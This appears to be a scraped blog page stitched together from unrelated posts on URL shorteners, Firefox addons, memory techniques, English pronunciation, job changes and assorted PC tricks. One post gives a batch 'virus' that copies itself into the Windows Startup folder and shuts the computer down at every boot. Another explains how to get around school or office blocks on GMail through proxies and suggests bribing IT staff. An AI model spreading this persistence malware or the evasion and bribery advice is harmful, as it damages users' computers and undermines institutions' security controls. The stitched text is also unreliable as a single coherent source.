A big list of ways to make Tiny URLs

With all the URL shortening sites that have been popping up lately -- and even services that let you make your own -- I thought it would be a good idea to take a look back at the link-shrinkers we've covered in the past here at CodeMasterz. Some of them are legitimately useful, while some of them are complete novelties that you'd only break out as a joke. You'll also have to forgive some of our references to getting Rickrolled -- it was a legitimate concern back then! So, without further ado, here's a big list of ways to create very small URLs:

NSFW.in is designed for sharing links that are Not Safe For Work. Its unique feature is a warning page, in case the person you're sharing your link with doesn't want to see it after all.

Bit.ly is still one of the best link shorteners around. It scores points for tracking the traffic to your shortened link, and letting you see if anyone else has made a bit.ly link to the same URL.

U.nu is a fairly recent entry with a super-short base URL, and the added bonus of generating links that are easy to read out loud to someone or type out from scratch.
Awe.sm is now offering to create a custom URL shortener for its clients, based on its own service that's not too shabby either.

Tinyarro.ws uses unicode symbols to make its short URLs even shorter (and kind of cool-looking).

SHUURL secures your shortened links by showing users a thumbnail of the site you linked to before they click through.

1link.in opens multiple sites with one shortened link. Users see a list of the links that are included, with the option to open one at a time or open all of them in tabs.

Tr.im is my personal favorite of the bunch. It's on the shorter side of short URLs, it tracks stats, and it lets you post your links to Twitter with one click.

BurnURL offers social sharing options for your short links, so you can easily Twitter, Facebook, Digg or Reddit them.

The DiggBar was the source of much controversy when it first launched, but it continues to be one of the best ways to share your Digg links.

TinyURL is considered the original link shortener, and still one of the best. Aside from being the default for Twitter, it's also kept up with the new kids by adding the ability to customize your links.

ceSnipURL is a shortener for Windows Mobile.

Su.pr is StumbleUpon's link shortener.

14 Extremely Useful Firefox Addons

My affinity for Firefox comes as much from the fantastic community of addon developers as it does from the program itself. Now, I'm sure you will have heard of some of these before: good Firefox addons tend to spread like wildfire. I hope I've managed to include some that you might have missed.

I've ranked just over a dozen addons that I find to be particularly useful - even to more casual Firefox users.

1. Cybersearch - Customizable Google searches in my Awesome Bar? Yes, please! It also supports keywords so you can enter things like "ds firefox addons" and limit your search to a specific web site (like CodeMasterz, for example). Enter a comma separated list of URLs to search a group of sites.

2. LastPass - I used to use KeePass, but I just like LastPass better. It did a great job of importing (and then removing) my Firefox stored passwords, and its secure password creation tool makes using different passwords on new sites a snap. The web interface is a great way to manage my logins and groups.

3. FEBE - As with anything else on your computer, it's never a bad idea to back up your Firefox install. FEBE will back up everything - extensions, themes, bookmarks - or just what you choose, and you can set up an automated schedule. It's also got integrated Box.net support, which is actually a fairly nice way to roll-you-rown manual Firefox syncing.

4. AdBlock Plus. I don't really use AdBlock because I hate advertisements, but because I don't like waiting for web pages to load. Flash ads and multiple banners really gum up the works, so I depend on AdBlock to keep things running smoothly. It's also a decent way to cut back on your bandwidth usage.

5. DownThemAll - When a friend first showed me DTA a few years ago, I couldn't believe I was still just using FF2's built-in manager. DTA rocks, and would definitely make my Top 5. It's simply one of the best download managers out there.

6. OpenItOnline - I don't do enough work with Office-type documents anymore to warrant installing a suite on my laptop. OpenItOnline lets me send DOC, XLS, and all the other supported file types to ZohoViewer for perusal instead of downloading them. It supports all Zoho and Google Docs apps to open files.

7. Deng Google Bookmarks - I'm not sold on Weave yet, so for now I let Google store my bookmarks. I switched to the Deng addon after using GMarks for the longest time - because I got tired of the giant "bookmark" button on my toolbar. Deng displays only a small star icon, and its management interface is superior.

8. Screengrab! - To quickly capture an entire web page, Screengrab is a great tool. It can save or copy an entire page, the visible portion, or a rectangular selection. If I don't actually need to print a page, Screengrab is an easy, environmentally friendly way for me to keep a copy of it.

9. HP Smart Web Printing - When I do need to print, HP's addon gives me the option to combine multiple web pages on one sheet of paper, eliminate elements I don't need to print, and it even allows saving to PDF. Always nice to see the big boys release something great for free.

10. Web Of Trust - WOT is a great way to keep yourself out of malware trouble. I think I'm a pretty responsible surfer, but I don't know the reputation of every site on the Internet. WOT gives you a heads up about the trustworthiness of a link (based on community input) before you visit it.

11. Shareaholic - Anyone that enjoys sharing links would do well to install this one: it supports a ton of services, including Digg, Delicious, Twitter, Pownce, Reddit, Facebook, MySpace, and Google. It's also a quick way to see how many Diggs or Delicious bookmarks a page has received. Bzzster support gives quick access to sharing items via email.

12. Pingfire - Another must for the social surfer. Ping.fm's multiple-site update service is rad, and Pingfire kicks it up a notch. No need to even visit Ping, just add the Pingfire icon to your toolbar and update your microblog and status sites with ultimate ease.

13. Tab Kit - It's got a whole slew of options for tab management: grouping, coloring, sorting, protection, mouse rocker and scroll wheel support, and many, many others. Visit the devloper's page for a full list of features.

14. Yet Another Smooth Scrolling - Firefox's default scrolling isn't quite as refined as I like it, so I use YASS to tweak things until they're just right. It supports up to three presets, which is nice for laptops. Keep one set for your touchpad and one for your mouse.

Since Downloadsquad readers are largely Firefox users, did I miss your favorite? Share it in the comments so our other readers don't miss out!

How to Retrain Your Brain

Give Your Brain a Boost

Can't remember where you put your glasses? Blanked on your new colleague's name? "Forgetting these types of things is a sign of how busy we are," says Zaldy S. Tan, MD, director of the Memory Disorders Clinic at Beth Israel Deaconess Medical Center in Boston. "When we're not paying good attention, the memories we form aren't very robust, and we have a problem retrieving the information later."

The key, says Harry Lorayne, author of Ageless Memory: Simple Secrets for Keeping Your Brain Young, is to get your brain in shape. "We exercise our bodies, but what good is that great body if you don't have the mental capabilities to go with it?" Sure, you could write everything down, keep organized lists and leave electronic notes on your BlackBerry, cell phone or PDA. But when you don't have access to those aids, or if you want to strengthen your brain, try these expert-recommended strategies to help you remember.

Brain Freeze #1
"What the heck is his name?"

• Pay attention. When you're introduced to someone, really listen to the person's name. Then, to get a better grasp, picture the spelling. Ask, "Is that Kathy with a K or a C?" Make a remark about the name to help lock it in ("Oh, Carpenter -- that was my childhood best friend's last name"), and use the name a few times during the conversation and when you say goodbye.

• Visualize the name. For hard-to-remember monikers (Bentavegna, Wobbekind), make the name meaningful. For Bentavegna, maybe you think of a bent weather vane. Picture it. Then look at the person, choose an outstanding feature (bushy eyebrows, green eyes) and tie the name to the face. If Mr. Bentavegna has a big nose, picture a bent weather vane instead of his nose. The sillier the image, the better.

• Create memorable associations. Picture Joe Everett standing atop Mount Everest. If you want to remember that Erin Curtis is the CEO of an architectural firm, imagine her curtsying in front of a large building, suggests Gini Graham Scott, PhD, author of 30 Days to a More Powerful Memory.

• Cheat a little. Supplement these tips with some more concrete actions. When you get a business card, after the meeting, jot down a few notes on the back of the card ("red glasses, lives in Springfield, went to my alma mater") to help you out when you need a reminder.

Brain Freeze #2
"Where in the world did I leave my glasses?"

• Give a play-by-play. Pay attention to what you're doing as you place your glasses on the end table. Remind yourself, "I'm putting my keys in my coat pocket," so you have a clear memory of doing it, says Scott.

• Make it a habit. Put a small basket on a side table. Train yourself to put your keys, glasses, cell phone or any other object you frequently use (or misplace) in the basket -- every time.

Brain Freeze #3
"What else was I supposed to do today?"

• Start a ritual. To remind yourself of a chore (write a thank-you note, go to the dry cleaner), give yourself an unusual physical reminder. You expect to see your bills on your desk, so leaving them there won't necessarily remind you to pay them. But place a shoe or a piece of fruit on the stack of bills, and later, when you spot the out-of-place object, you'll remember to take care of them, says Carol Vorderman, author of Super Brain: 101 Easy Ways to a More Agile Mind.

• Sing it. To remember a small group of items (a grocery list, phone number, list of names, to-do list), adapt it to a well-known song, says Vorderman. Try "peanut butter, milk and eggs" to the tune of "Twinkle, Twinkle, Little Star," "Happy Birthday" or even nursery rhymes.

• Try mnemonic devices. Many of us learned "ROY G BIV" to remember the colors of the rainbow, or "Every Good Boy Deserves Favors" to learn musical notes. Make up your own device to memorize names (Suzanne's kids are Adam, Patrick and Elizabeth, or "APE"), lists (milk, eggs, tomatoes, soda, or "METS") or computer commands (to shut down your PC, hit Control+Alt+Delete, or "CAD").

• Use your body. When you have no pen or paper and are making a mental grocery or to-do list, remember it according to major body parts, says Scott. Start at your feet and work your way up. So if you have to buy glue, cat food, broccoli, chicken, grapes and toothpaste, you might picture your foot stuck in glue, a cat on your knee looking for food, a stalk of broccoli sticking out of your pants pocket, a chicken pecking at your belly button, a bunch of grapes hanging from your chest and a toothbrush in your mouth.

• Go Roman. With the Roman room technique, you associate your grocery, to-do or party-invite list with the rooms of your house or the layout of your office, garden or route to work. Again, the zanier the association, the more likely you'll remember it, says Scott. Imagine apples hanging from the chandelier in your foyer, spilled cereal all over the living room couch, shampoo bubbles overflowing in the kitchen sink and cheese on your bedspread.

Brain Freeze #4
"What's my password for this website?"

• Shape your numbers. Assign a shape to each number: 0 looks like a ball or ring; 1 is a pen; 2 is a swan; 3 looks like handcuffs; 4 is a sailboat; 5, a pregnant woman; 6, a pipe; 7, a boomerang; 8, a snowman; and 9, a tennis racket. To remember your ATM PIN (4298, say), imagine yourself on a sailboat (4), when a swan (2) tries to attack you. You hit it with a tennis racket (9), and it turns into a snowman (8). Try forgetting that image!

• Rhyme it. Think of words that rhyme with the numbers 1 through 9 (knee for 3, wine for 9, etc.). Then create a story using the rhyming words: A nun (1) in heaven (7) banged her knee (3), and it became sore (4).

Brain Freeze #5

"The word is on the tip of my tongue."

• Practice your ABCs. Say you just can't remember the name of that movie. Recite the alphabet (aloud or in your head). When you get to the letter R, it should trigger the name that's escaping you: Ratatouille. This trick works when taking tests too.

Brain Freeze #6
"I just can't memorize anything anymore!"

• Read it, type it, say it, hear it. To memorize a speech, toast or test material, read your notes, then type them into the computer. Next, read them aloud and tape-record them. Listen to the recording several times. As you work on memorizing, remember to turn off the TV, unplug your iPod and shut down your computer; you'll retain more.

• Use color. Give your notes some color with bolded headings and bulleted sections (it's easier to remember a red bullet than running text).

• Make a map. Imagine an intersection and mentally place a word, fact or number on each street corner.

English Proficiency Tips. How to improve English

Practice with Pronunciation Using English is a stress-timed language and, as such, good pronunciation depends a lot on the ability to accent the correct words and successfully use intonation to make sure you are understood. Simply put, spoken English stress the principal elements in a sentence - content words - and quickly glides over the less important words - function words. Nouns, principal verbs, adjectives and adverbs are all content words. Pronouns, articles, auxiliary verbs, prepositions, conjunctions are function words and are pronounced quickly moving towards the more important words. This quality of quickly gliding over less important words is also known as 'connected speech'.

In a plain manner, focusing on the 'correct' pronunciation of each word - much as some students do when trying to pronounce well.In the natural, manner with content words being stressed and function words receiving little stress.

Ten Tips for Accent Reduction

Observe the mouth movements of native speakers and try to imitate them

When you are watching T.V. look at the mouth movements of the speakers. Repeat what they are saying, imitating the intonation and rhythm of their speech.

Listen to the “music” of English.
Don’t use the music of your native language when you are speaking English. Each language has its own way of “singing”.

Make a list of frequently used words that are difficult for you to pronounce and ask a native speaker to pronounce them for you.

Record these words, listen to them and practice saying them.

Pronounce the ending of each word.

Pay special attention to “s” and “ed” endings.

Record your own voice and listen for pronunciation mistakes.

Many people hate to hear the sound of their voice and avoid having to listen to themselves speaking. However, this is a very important exercise because doing it will help you become conscious of the mistakes that you are making.

Until you learn the correct intonation and rhythm of English, slow down your speech.
If you speak too quickly with the wrong intonation and rhythm, native speakers will have a hard time understanding you. Don’t worry about your listener getting impatient with your slow speech – it is more important that everything you say be understood.

Use your dictionary
Become familiar with the phonetic symbols of your dictionary and look up the correct pronunciation of words that are hard for you to say.

Buy books on tape.
Listen and read at the same time. Record yourself reading some sections of the book. Compare the sound of your English with that of the speaker from the book on tape.

Read aloud in English for fifteen to twenty minutes each day.
This will help you strengthen the mouth muscles that you use when you speak English. Research has shown that it takes about three months of daily practice to develop strong mouth muscles for speaking a new language.

Be patient.

You can change the way you speak but it won’t happen overnight. People often expect instant results and give up too soon. You can change the way you sound if you are willing to put some effort into it.

Tongue Twisters , may help you to pronounce clearly

Practice these everyday…..

Reasons To Look For A New Job: Which Ones Should You Avoid Mentioning?

When you need to switch a job?

There are many reasons why you might consider looking for a new job.

Certainly, the end of one year and the beginning of a new one when we’re making New Year’s resolutions is when we often think about changing jobs.

Maybe circumstances in your life have changed and have necessitated a job change.

Perhaps it’s just time to move on from your current job and has nothing to do with timing.

While there are many legitimate reasons for looking for a new job, not every one should be mentioned during a job interview.

Here are some reasons for changing jobs along with some advice regarding which reasons are ones you want to avoid mentioning during an interview.

Reasons For Changing Jobs

1. You lost your last job. Layoffs and firings do happen. When discussing this subject in an interview, the best thing to do is to keep your answer factual and brief. Lying only gets you into trouble.

2. You’re underemployed and are looking for something that better matches your skills, experience and career aspirations.

3. You’re simply looking for a better opportunity. How do you define “better” though? There could be many answers to this question. If you are looking for a job that better showcases your skills and is more challenging, those are certainly good reasons to search for a new job.

4. You want a job closer to home. Have those long commutes finally gotten to you? Had enough of taking public transit to work? Maybe you’d just like to find a job with a shorter commute.

5. You’re travelling too much. Perhaps you are travelling way too much in your current job for your liking and are seeing more airports than you’re seeing your own house. Just make sure your next job doesn’t end up having the same travel component.

6. You want better long-term prospects. Maybe your current employer is in a dying industry, maybe it’s poorly managed, perhaps the long-term viability of the company/industry is in question.

7. You want a bigger/smaller company. The size of the company you work for can often have big implications in your career. You might like the family-like atmosphere of a small company or maybe you prefer a larger firm with more stability and more promotion possibilities.

8. Personal reasons. Perhaps the birth of a child, a recent marriage or another change in your personal life has resulted in you deciding that a fresh start is in order and you’re going to start with a new job.

9. You perceive unfairness with how you’re being treated. Is you manager treating you unfairly or not being totally honest with you? If you perceive you are being unfairly treated, you might decide this is important enough to look for a new job.

10. You were passed over for a promotion(s). If other people keep moving ahead of you on the corporate ladder, you might read the writing on the wall and believe that your chances for promotion are going to come with a different employer.

11. Ethical reasons. Have you discovered that your company is doing something they shouldn’t be or perhaps something you don’t wish to be part of? Maybe your company does something that goes against your value structure or that violates your religious beliefs.

Two More Legitimate Reasons For Looking For a New Job… That You Might Want To Avoid Mentioning During An Interview

While the following two reasons are legitimate reasons for looking for a new job, the might be reasons you don’t actually mention during an interview. Some things are simply better left unsaid.

12. You have a problem with your boss/colleagues. Let’s face it, some people are just hard to get along with and some of them might view us the same way. Looking for a new job because one or more people you work with are causing you grief is certainly a legitimate reason but I’m not sure I’d mention this during an interview. While it’s realistic that we won’t get along with everyone we work with, you will need to carefully consider how you refer to this topic during an interview to avoid making it look like you’re the one who is hard to get along with.

13. You want/need more money. Maybe you feel you are paid less than what you are worth or perhaps you work for a company that is known for underpaying staff (some companies and industries have this reputation). Maybe your lifestyle requires that you earn more money quickly. While this is a good reason for looking for a new job, it’s not a good reason to give during an interview because you will look money motivated and no hiring manager wants to hire someone who will jump for a few dollars. If you’re simply looking for a raise, maybe you should first ask your boss for one before you start a job search?

Use your common sense if the reason you’re looking for a new job is one that a potential employer might not want to hear and if you think it could ruin your chances at the job.

I’m not suggesting you lie, I’m simply suggesting you carefully consider what you divulge.

Afterall, if you’re interviewing for a new job and the previous person who held the position got fired for having a work affair with a colleague or something crazy like that, do you think the hiring manager is going to come out and tell you exactly what happened?

How To Access Blocked GMail From School or Office

Are you a GMail addict and tired of your office or school administration blocking access to GMail? Here is a guide with various tricks to unblock your favorite GMail and enjoy the full mail access at your organization.

1. Instead of gmail.com Use Different Address Like mail.google.com, google.com/mail, etc

Instead of using the URL gmail.com to access your GMail account, try other web address like mail.google.com, google.com/mail when GMail is blocked at your school/office. This trick is expected to work if the IT administrators has blocked gmail.com alone and left the rest of the domains open as they are not widely known to people. Here is the list of alternative address to access GMail

* http://m.gmail.com
* https://gmail.com
* http://google.com/mail
* http://mail.google.com or https://mail.google.com
* http://googlemail.com

Photobucket

2. Access Blocked GMail Using iGoogle

GMail is available as a gadge to iGoogle and you can use this gadget to access GMail. When you access GMail through iGoogle all the communication with the GMail servers is routed through iGoogle servers. So this defeats all the restriction and filters applied by IT administrators in blocking gmail.com domain.

Photobucket

To access GMail through iGoogle

1. Login to iGoogle using your Google Account
2. Add GMail gadget to iGoogle by following this link or by using Add Stuff on screen
3. That’s all. Start accessing your GMail inside iGoogle.

3. Access GMail Using Opera Mini Simulator

Use Opera Mini Browser Online Simulator application to access GMail in a small screen window. Opera Mini is a popular web browser for mobile phones. It allows users to work with live demo of Opera Mini that functions exactly like it would when installed on a handset.

Photobucket

Point your browser to http://www.operamini.com/demo/ and start accessing blocked GMail using the URL m.gmail.com.

Reading mails on mobile simulator is definitely not convenient as reading them on a full screen browser computer. But when you need to access your GMail urgently, This trick might be helpful to you.

4. Use Microsoft Outlook Or Other Mail Programs To Access GMail Using POP3/IMAP

Configure your mail clients like Outlook, Live Mail, Lotus Notes to access GMail using POP3 or IMAP protocol. This trick of accessing GMail when blocked is mostly useful for working professionals as they should be definitely using some mail client for official mail access.

You can find the instruction to configure POP3 and IMAP access for various mail clients over here and here.

5. Launch GMail from Google Talk

launch_gmail_from_google_talk At few organizations they block access to GMail but not to Google Talk. If that is the case at your organization, then you can launch GMail from Google Talk application. Sign in to GTalk and click on the envelope icon to launch access GMail.

6. Use Your Smart Phones

If you have internet connection on your mobile, you can make use of your mobile phone to access GMail.

GMail has an excellent native application for most of the mobiles like iPhone, Nokia, Android, Windows Mobile, etc. The ease at which you can read and reply to mails through GMail for Mobile is amazing. It is my favorite mobile application.

You can download GMail application for mobiles from Google

7. Use Proxy Web Site To Bypass

Using proxy website to beat censorship is one of the popular ways for unblocking any kind of websites. When we try to access GMail using a web proxy, the web proxy hides our IP address and uses it’s own IP address to load the page.

8. Nothing Working? Then Bribe Your IT Administrator

If none of the above methods worked for you then take help of someone at IT department and get access to GMail. Bribe them :) Offer small gifts, drinks or something else they like.

Either you can ask them to grant access for your PC or get details of internal proxy server that allow GMail access.

  • How to add ur own created viruses into start ups this will make it diifcult to detect them n to remove them ...

1) For this u can use the simple code below ..

@echo off

copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

n den rest of the code ..

2) suppose u want to make a shutdown.bat a virus which will copy itself in start up n wenever comptuer starts it will shut down it in 2 secs..most dangerous kind of thing better to make create restore point before working with such files..

@echo off

copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
@echo off
shutdown -s -t 5 -c "Shutdown"
save it as abcd.bat when ever u will run it it will be saved in ur start ups..
here t 5 means that ur comp will take5 secs to shut down u can make it 2 as well then it will be most dangerous thing to handle .. lol

Do not try it on your PC. Don’t mess around this is for educational purpose only

How to Change Yahoo messenger title bar

Hey guys you can change the yahoo messenger title bar...
For this just find the folder messenger in the drive in which the messenger is installed. Then search a file named "ymsgr". In this file just go to the end and write the following code:
[APP TITLE]
CAPTION=Red Devil
Here you can write any name in place of Red Devil... then see the fun.... You can have your own name being placed in yahoo messenger title bar.

Enable Right Clicks on The Sites that Disable it

Lots of web sites have disabled the right click function of the mouse button... it's really, really annoying. This is done so that you don't steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.

It's easy to change, assuming your using IE 6:
Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "Ok" a couple of times.

You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.
